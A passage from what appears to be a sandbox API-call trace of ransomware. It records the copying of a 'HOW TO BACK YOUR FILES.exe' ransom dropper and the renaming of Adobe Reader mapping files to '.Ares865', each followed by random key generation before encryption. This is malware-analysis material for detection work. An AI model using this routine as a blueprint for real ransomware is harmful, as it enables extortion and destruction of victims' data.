dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.339] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=522779) returned 1 [0155.339] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.340] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.340] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.359] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.360] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.360] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.368] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac" [0155.368] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac" [0155.368] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.368] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.370] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.370] GetLastError () returned 0x0 [0155.371] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.371] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x834450e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5405a340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5405a340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.371] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.371] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.371] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="ARABIC.TXT" | out: lpString1="ARABIC.TXT") returned="ARABIC.TXT" [0155.371] lstrlenW (lpString="ARABIC.TXT") returned 10 [0155.371] lstrlenW (lpString="Ares865") returned 7 [0155.371] lstrcmpiW (lpString1="BIC.TXT", lpString2="Ares865") returned 1 [0155.372] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT.Ares865") returned 101 [0155.372] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\arabic.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\arabic.txt.ares865"), dwFlags=0x1) returned 1 [0155.374] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\arabic.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.374] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23784) returned 1 [0155.374] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.375] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.375] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.378] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.378] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.378] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.379] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CENTEURO.TXT" | out: lpString1="CENTEURO.TXT") returned="CENTEURO.TXT" [0155.379] lstrlenW (lpString="CENTEURO.TXT") returned 12 [0155.379] lstrlenW (lpString="Ares865") returned 7 [0155.379] lstrcmpiW (lpString1="URO.TXT", lpString2="Ares865") returned 1 [0155.380] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT.Ares865") returned 103 [0155.380] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\centeuro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\centeuro.txt.ares865"), dwFlags=0x1) returned 1 [0155.381] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\centeuro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.381] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12948) returned 1 [0155.382] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.382] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.382] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.385] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.386] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.386] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.387] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CHINSIMP.TXT" | out: lpString1="CHINSIMP.TXT") returned="CHINSIMP.TXT" [0155.387] lstrlenW (lpString="CHINSIMP.TXT") returned 12 [0155.387] lstrlenW (lpString="Ares865") returned 7 [0155.387] lstrcmpiW (lpString1="IMP.TXT", lpString2="Ares865") returned 1 [0155.387] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT.Ares865") returned 103 [0155.387] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chinsimp.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chinsimp.txt.ares865"), dwFlags=0x1) returned 1 [0155.391] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chinsimp.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.392] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=203429) returned 1 [0155.392] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.393] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.393] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.402] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.403] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.403] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.406] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CHINTRAD.TXT" | out: lpString1="CHINTRAD.TXT") returned="CHINTRAD.TXT" [0155.406] lstrlenW (lpString="CHINTRAD.TXT") returned 12 [0155.406] lstrlenW (lpString="Ares865") returned 7 [0155.406] lstrcmpiW (lpString1="RAD.TXT", lpString2="Ares865") returned 1 [0155.407] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT.Ares865") returned 103 [0155.407] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chintrad.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chintrad.txt.ares865"), dwFlags=0x1) returned 1 [0155.408] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chintrad.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.408] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=336055) returned 1 [0155.409] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.409] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.409] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.424] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.424] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.424] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.429] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CORPCHAR.TXT" | out: lpString1="CORPCHAR.TXT") returned="CORPCHAR.TXT" [0155.429] lstrlenW (lpString="CORPCHAR.TXT") returned 12 [0155.429] lstrlenW (lpString="Ares865") returned 7 [0155.429] lstrcmpiW (lpString1="HAR.TXT", lpString2="Ares865") returned 1 [0155.430] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT.Ares865") returned 103 [0155.430] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\corpchar.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\corpchar.txt.ares865"), dwFlags=0x1) returned 1 [0155.431] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\corpchar.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.431] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18952) returned 1 [0155.432] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.432] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.432] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.435] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.436] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.436] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.436] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CROATIAN.TXT" | out: lpString1="CROATIAN.TXT") returned="CROATIAN.TXT" [0155.437] lstrlenW (lpString="CROATIAN.TXT") returned 12 [0155.437] lstrlenW (lpString="Ares865") returned 7 [0155.437] lstrcmpiW (lpString1="IAN.TXT", lpString2="Ares865") returned 1 [0155.437] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT.Ares865") returned 103 [0155.437] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\croatian.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\croatian.txt.ares865"), dwFlags=0x1) returned 1 [0155.439] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\croatian.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.439] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13552) returned 1 [0155.439] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.440] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.440] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.443] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.443] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.443] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.444] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CYRILLIC.TXT" | out: lpString1="CYRILLIC.TXT") returned="CYRILLIC.TXT" [0155.444] lstrlenW (lpString="CYRILLIC.TXT") returned 12 [0155.444] lstrlenW (lpString="Ares865") returned 7 [0155.444] lstrcmpiW (lpString1="LIC.TXT", lpString2="Ares865") returned 1 [0155.444] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT.Ares865") returned 103 [0155.445] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\cyrillic.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\cyrillic.txt.ares865"), dwFlags=0x1) returned 1 [0155.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\cyrillic.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.447] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13432) returned 1 [0155.448] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.448] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.448] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.451] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.452] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.452] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.452] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="FARSI.TXT" | out: lpString1="FARSI.TXT") returned="FARSI.TXT" [0155.452] lstrlenW (lpString="FARSI.TXT") returned 9 [0155.453] lstrlenW (lpString="Ares865") returned 7 [0155.453] lstrcmpiW (lpString1="RSI.TXT", lpString2="Ares865") returned 1 [0155.453] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT.Ares865") returned 100 [0155.453] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\farsi.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\farsi.txt.ares865"), dwFlags=0x1) returned 1 [0155.456] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\farsi.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.457] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24901) returned 1 [0155.457] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.458] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.458] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.461] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.461] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.461] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.462] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="GREEK.TXT" | out: lpString1="GREEK.TXT") returned="GREEK.TXT" [0155.462] lstrlenW (lpString="GREEK.TXT") returned 9 [0155.462] lstrlenW (lpString="Ares865") returned 7 [0155.462] lstrcmpiW (lpString1="EEK.TXT", lpString2="Ares865") returned 1 [0155.463] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT.Ares865") returned 100 [0155.463] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\greek.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\greek.txt.ares865"), dwFlags=0x1) returned 1 [0155.465] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\greek.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.465] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13355) returned 1 [0155.465] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.466] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.466] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.468] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.469] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.469] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.470] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="HEBREW.TXT" | out: lpString1="HEBREW.TXT") returned="HEBREW.TXT" [0155.470] lstrlenW (lpString="HEBREW.TXT") returned 10 [0155.470] lstrlenW (lpString="Ares865") returned 7 [0155.470] lstrcmpiW (lpString1="REW.TXT", lpString2="Ares865") returned 1 [0155.470] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT.Ares865") returned 101 [0155.470] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\hebrew.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 